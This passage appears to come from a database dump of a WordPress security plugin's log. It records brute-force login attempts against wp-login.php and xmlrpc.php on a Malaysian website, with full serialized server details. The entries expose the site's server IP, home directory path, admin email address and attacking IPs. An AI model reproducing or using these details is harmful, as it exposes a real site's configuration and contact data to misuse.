Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"123.51.152.53\";s:11:\"REMOTE_PORT\";s:5:\"38114\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYBBzrIp53uPsY7BKArJYQAAAFc\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1568686543.058\";s:12:\"REQUEST_TIME\";s:10:\"1568686543\";}}','notice','2019-09-17 02:15:44','2019-09-17 02:15:43',17745904,19232888,'https://bintara.com.my/wp-login.php',1,0,'123.51.152.53'),(24347,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"123.51.152.53\";s:11:\"REMOTE_PORT\";s:5:\"38114\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYBBzrIp53uPsY7BKArJYQAAAFc\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:14:\"1568686543.058\";s:12:\"REQUEST_TIME\";s:10:\"1568686543\";}}','notice','2019-09-17 02:15:44','2019-09-17 02:15:43',17907216,19232888,'https://bintara.com.my/wp-login.php',1,0,'123.51.152.53'),(24348,0,'brute_force','invalid-login::username-[login]','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:7:\"[login]\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"475\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"123.51.152.53\";s:11:\"REMOTE_PORT\";s:5:\"38620\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYBB0WkPXSyJlCUJQmpSngAAAYk\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568686545.3958\";s:12:\"REQUEST_TIME\";s:10:\"1568686545\";}}','notice','2019-09-17 02:15:47','2019-09-17 02:15:45',18259776,19558336,'https://bintara.com.my/xmlrpc.php',1,0,'123.51.152.53'),(24349,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"93\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"104.248.27.238\";s:11:\"REMOTE_PORT\";s:5:\"41852\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYBDrbIp53uPsY7BKArJlAAAAFg\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568687021.8999\";s:12:\"REQUEST_TIME\";s:10:\"1568687021\";}}','notice','2019-09-17 02:23:43','2019-09-17 02:23:42',17744256,19234504,'https://bintara.com.my/wp-login.php',1,0,'104.248.27.238'),(24350,0,'brute_force','invalid-login::username-[login]','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:7:\"[login]\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"475\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"104.248.27.238\";s:11:\"REMOTE_PORT\";s:5:\"42608\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYBDsWkPXSyJlCUJQmpTwgAAAZY\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568687025.7195\";s:12:\"REQUEST_TIME\";s:10:\"1568687025\";}}','notice','2019-09-17 02:23:47','2019-09-17 02:23:46',18258648,19556632,'https://bintara.com.my/xmlrpc.php',1,0,'104.248.27.238'),(24351,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"91\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"149.202.201.88\";s:11:\"REMOTE_PORT\";s:5:\"39330\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYBFYGkPXSyJlCUJQmpU4gAAAYc\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568687456.1846\";s:12:\"REQUEST_TIME\";s:10:\"1568687456\";}}','notice','2019-09-17 02:30:57','2019-09-17 02:30:56',17744072,19234600,'https://bintara.com.my/wp-login.php',1,0,'149.202.201.88'),(24352,0,'brute_force','invalid-login::username-[login]','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:7:\"[login]\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"475\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"149.202.201.88\";s:11:\"REMOTE_PORT\";s:5:\"39815\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYBFYg99C9j9bhK9KplCKAAAAQY\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568687458.9266\";s:12:\"REQUEST_TIME\";s:10:\"1568687458\";}}','notice','2019-09-17 02:31:00','2019-09-17 02:30:59',18260680,19560352,'https://bintara.com.my/xmlrpc.php',1,0,'149.202.201.88'),(24353,0,'brute_force','invalid-login::username-[login]','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:7:\"[login]\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"475\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:14:\"103.22.250.194\";s:11:\"REMOTE_PORT\";s:5:\"34950\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:51:\"/home/norfaiz/public_html/bintara.com.my/xmlrpc.php\";s:11:\"SCRIPT_NAME\";s:11:\"/xmlrpc.php\";s:10:\"SCRIPT_URI\";s:33:\"https://bintara.com.my/xmlrpc.php\";s:10:\"SCRIPT_URL\";s:11:\"/xmlrpc.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYBHzWkPXSyJlCUJQmpWfgAAAY0\";s:8:\"PHP_SELF\";s:11:\"/xmlrpc.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568688077.9787\";s:12:\"REQUEST_TIME\";s:10:\"1568688077\";}}','notice','2019-09-17 02:41:19','2019-09-17 02:41:18',18258160,19557720,'https://bintara.com.my/xmlrpc.php',1,0,'103.22.250.194'),(24354,0,'brute_force','invalid-login','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:12:\"wp-login.php\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_username\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The username field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:0:\"\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:38:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:13:\"/wp-login.php\";s:14:\"CONTENT_LENGTH\";s:2:\"92\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:11:\"HTTP_COOKIE\";s:37:\"wordpress_test_cookie=WP+Cookie+check\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 Firefox/62.0\";s:12:\"HTTP_X_HTTPS\";s:1:\"1\";s:4:\"PATH\";s:13:\"/bin:/usr/bin\";s:12:\"QUERY_STRING\";s:0:\"\";s:15:\"REDIRECT_STATUS\";s:3:\"200\";s:11:\"REMOTE_ADDR\";s:13:\"103.15.226.14\";s:11:\"REMOTE_PORT\";s:5:\"40145\";s:14:\"REQUEST_METHOD\";s:4:\"POST\";s:14:\"REQUEST_SCHEME\";s:5:\"https\";s:15:\"SCRIPT_FILENAME\";s:53:\"/home/norfaiz/public_html/bintara.com.my/wp-login.php\";s:11:\"SCRIPT_NAME\";s:13:\"/wp-login.php\";s:10:\"SCRIPT_URI\";s:35:\"https://bintara.com.my/wp-login.php\";s:10:\"SCRIPT_URL\";s:13:\"/wp-login.php\";s:11:\"SERVER_ADDR\";s:12:\"103.6.198.69\";s:12:\"SERVER_ADMIN\";s:31:\"webmaster@bintaramy.norfaiz.com\";s:11:\"SERVER_NAME\";s:14:\"bintara.com.my\";s:11:\"SERVER_PORT\";s:3:\"443\";s:15:\"SERVER_PROTOCOL\";s:8:\"HTTP/1.1\";s:16:\"SERVER_SIGNATURE\";s:0:\"\";s:11:\"SSL_TLS_SNI\";s:14:\"bintara.com.my\";s:2:\"TZ\";s:17:\"Asia/Kuala_Lumpur\";s:9:\"UNIQUE_ID\";s:27:\"XYBJMh@uZ4OC5N1Fn8E5DQAAAIg\";s:8:\"PHP_SELF\";s:13:\"/wp-login.php\";s:18:\"REQUEST_TIME_FLOAT\";s:15:\"1568688434.7471\";s:12:\"REQUEST_TIME\";s:10:\"1568688434\";}}','notice','2019-09-17 02:47:16','2019-09-17 02:47:15',17739672,19230656,'https://bintara.com.my/wp-login.php',1,0,'103.15.226.14'),(24355,0,'brute_force','invalid-login::username-[login]','a:5:{s:7:\"details\";a:2:{s:6:\"source\";s:6:\"xmlrpc\";s:20:\"authentication_types\";a:1:{i:0;s:21:\"username_and_password\";}}s:4:\"user\";O:8:\"WP_Error\":2:{s:6:\"errors\";a:1:{s:14:\"empty_password\";a:1:{i:0;s:52:\"<strong>ERROR</strong>: The password field is empty.\";}}s:10:\"error_data\";a:0:{}}s:8:\"username\";s:7:\"[login]\";s:7:\"user_id\";b:0;s:6:\"SERVER\";a:37:{s:15:\"SERVER_SOFTWARE\";s:6:\"Apache\";s:11:\"REQUEST_URI\";s:11:\"/xmlrpc.php\";s:14:\"CONTENT_LENGTH\";s:3:\"475\";s:12:\"CONTENT_TYPE\";s:33:\"application/x-www-form-urlencoded\";s:21:\"CONTEXT_DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:14:\"CONTEXT_PREFIX\";s:0:\"\";s:13:\"DOCUMENT_ROOT\";s:40:\"/home/norfaiz/public_html/bintara.com.my\";s:17:\"GATEWAY_INTERFACE\";s:7:\"CGI/1.1\";s:5:\"HTTPS\";s:2:\"on\";s:20:\"HTTP_ACCEPT_ENCODING\";s:4:\"gzip\";s:15:\"HTTP_CONNECTION\";s:5:\"close\";s:9:\"HTTP_HOST\";s:14:\"bintara.com.my\";s:15:\"HTTP_USER_AGENT\";s:76:\"Mozilla/5.0 (X11; Ubuntu; Linux x86_64; rv:62.0) Gecko/20100101 